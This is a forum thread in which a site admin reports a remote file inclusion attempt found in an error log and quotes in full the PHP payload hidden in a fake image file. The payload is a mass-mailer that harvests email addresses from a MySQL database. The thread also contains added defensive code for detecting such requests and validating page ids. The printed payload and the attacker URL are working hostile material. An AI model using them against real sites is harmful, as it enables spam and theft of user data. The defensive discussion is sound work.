Hi folks,
while parsing the error messages of my forum I found the following:
Add filter: show only error messages from this user Guest Yesterday at 01:33:13
Add filter: show only error messages from this IP address 81.199.58.39
Add filter: show only error messages for this URL http://www.rad-community.de/ds1test/index.php?page=http://ibank.glwb.info/mayer.jpg?
Add filter: show only error messages with the same message
Database error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://ibank.glwb.info/mayer.jpg? AND off=0 AND approved=1 LIMIT 1' at line 1
File: /var/www/rad-community/htdocs/ds1test/Sources/TPortal.php
Line: 368
I was wondering what the guest wanted to do, so I checked the link and found the following code hidden in mayer.jpg:
<?
If ($action=="mysql"){
#Grab email addresses de MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida.");
mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb");
$result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
Mail:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload
Txt:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Plain
<input type="radio" name="contenttype" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send Emails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Porfavor complete todo lo necesario.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
?>
<p align="center"><b>Hosted by XGnDX </b></p>
It seems to me that this is an attempt to get all the email addresses out of the SQL database to use them as spam addresses.
Does anybody know this already, or is it completely new?
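The thing that gave the attempt away in the error log above is a query parameter whose value is itself a URL (page=http://...). The following is an added example, not code from the original post, of how an admin could sweep logged request URLs for that pattern rather than spotting it by eye; the log entries in it are constructed, using the IP and URL shown above plus two made-up ones.

```php
<?php
// Added example, not code from the original post: flag request URLs whose
// query-string values are themselves URLs, the remote-file-inclusion pattern
// visible in the error log above (page=http://...). Log entries are constructed.
declare(strict_types=1);

/**
 * Return the query parameters of $requestUrl whose values parse as absolute
 * URLs with a remote scheme. parse_str() decodes percent-encoding, so
 * page=http%3A%2F%2F... is caught as well as the plain form.
 */
function findRemoteUrlParams(string $requestUrl): array
{
    $query = parse_url($requestUrl, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);
    $remoteSchemes = ['http', 'https', 'ftp'];
    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;               // nested arrays (a[]=...) are not URLs
        }
        $scheme = parse_url($value, PHP_URL_SCHEME);
        if (is_string($scheme) && in_array(strtolower($scheme), $remoteSchemes, true)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

// Constructed entries in the shape of the forum's error log: IP plus request URL.
// The first is the one quoted above; the other two use documentation-range addresses.
$logEntries = [
    ['ip' => '81.199.58.39', 'url' => 'http://www.rad-community.de/ds1test/index.php?page=http://ibank.glwb.info/mayer.jpg?'],
    ['ip' => '192.0.2.10',   'url' => 'http://www.rad-community.de/ds1test/index.php?page=12'],
    ['ip' => '198.51.100.7', 'url' => 'http://www.rad-community.de/ds1test/index.php?page=http%3A%2F%2F203.0.113.5%2Fx.txt%3F'],
];

foreach ($logEntries as $entry) {
    $hits = findRemoteUrlParams($entry['url']);
    if ($hits === []) {
        continue;                   // page=12 and similar are left alone
    }
    foreach ($hits as $param => $value) {
        printf("%s: parameter '%s' carries a remote URL: %s\n", $entry['ip'], $param, $value);
    }
}
```

Only the first and third entries are reported; the percent-encoded variant is caught because parse_str() decodes it before the scheme check runs. Matching on the decoded value is what matters: a plain substring search for "http://" in the raw URL would miss the encoded form.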
PowerPyx
Not knowing PHP well enough, it seems to me that they're trying to use some type of exploit.
If he would have used png, it would have worked.
At least in TP that will not work. The "page" number compares its value to the id in the database. This routine seems to be trying to make something be executed, like the "page" will contain code of some sort, for example. But sending executable code through GET values is very unsafe, so I don't think anyone does that.
Script kiddie?
Anyways, in TP0.9 this will also be better filtered. Any non-number calls will simply not happen, just be reported.
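To make the "only numbers get through, everything else is just reported" idea concrete, here is an added example that is not TinyPortal's code: the fragile pattern that produces the logged syntax error, beside a handler that accepts only a decimal id, writes anything else to the error log, and binds the id as a query parameter. The table and column names are assumptions, and an in-memory SQLite database stands in for MySQL so the snippet runs offline.

```php
<?php
// Added example, not TinyPortal's code: the fragile pattern behind the logged
// error beside a hardened version that accepts only a numeric id and reports
// anything else, the behaviour Bloc describes for TP0.9. Table and column
// names are assumptions; SQLite stands in for MySQL so this runs offline.
declare(strict_types=1);

// Fragile: the raw ?page= value is spliced into the SQL text. The value
// "http://ibank.glwb.info/mayer.jpg?" yields exactly the syntax error in the log.
function fragilePageQuery(string $page): string
{
    return "SELECT id, title FROM articles WHERE id=$page AND off=0 AND approved=1 LIMIT 1";
}

/**
 * Accept only a plain decimal id (digits only, at most 10 of them) and return
 * it as int; otherwise hand the raw value to $report and return null.
 */
function pageIdOrNull(string $raw, callable $report): ?int
{
    if ($raw === '' || strlen($raw) > 10 || !ctype_digit($raw)) {
        $report('Rejected non-numeric page parameter: ' . $raw);
        return null;
    }
    return (int) $raw;
}

// The id is bound as a parameter, so it can never alter the SQL text.
function loadPage(PDO $db, int $id): ?array
{
    $stmt = $db->prepare(
        'SELECT id, title FROM articles WHERE id = :id AND off = 0 AND approved = 1 LIMIT 1'
    );
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed fixture: one published article with id 12.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, off INTEGER, approved INTEGER)');
$db->exec("INSERT INTO articles VALUES (12, 'Welcome', 0, 1)");

$report = static function (string $msg): void {
    error_log($msg);            // where the forum would write its error log entry
    echo "logged: $msg\n";
};

// The value from the error log above, then a legitimate one.
foreach (['http://ibank.glwb.info/mayer.jpg?', '12'] as $raw) {
    echo 'fragile SQL: ' . fragilePageQuery($raw) . "\n";
    $id = pageIdOrNull($raw, $report);
    if ($id === null) {
        echo "page '$raw' -> not served\n";
        continue;
    }
    $row = loadPage($db, $id);
    echo "page '$raw' -> " . ($row === null ? 'not found' : $row['title']) . "\n";
}
```

The first iteration shows the broken query text and then the rejection being logged instead of executed; the second resolves to the article. ctype_digit() is stricter than is_numeric() here on purpose: it refuses signs, whitespace, decimals and exponents, so the only thing that reaches the database is a small positive integer, and the prepared statement keeps even that from becoming part of the SQL text.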
Quote from: Xarcell on May 09, 2006, 04:09:30 AM
If he would have used png, it would have worked.
May I ask what you are talking about Xarcell? What does the type of graphic have to do with them trying to inject the SQL server with some code?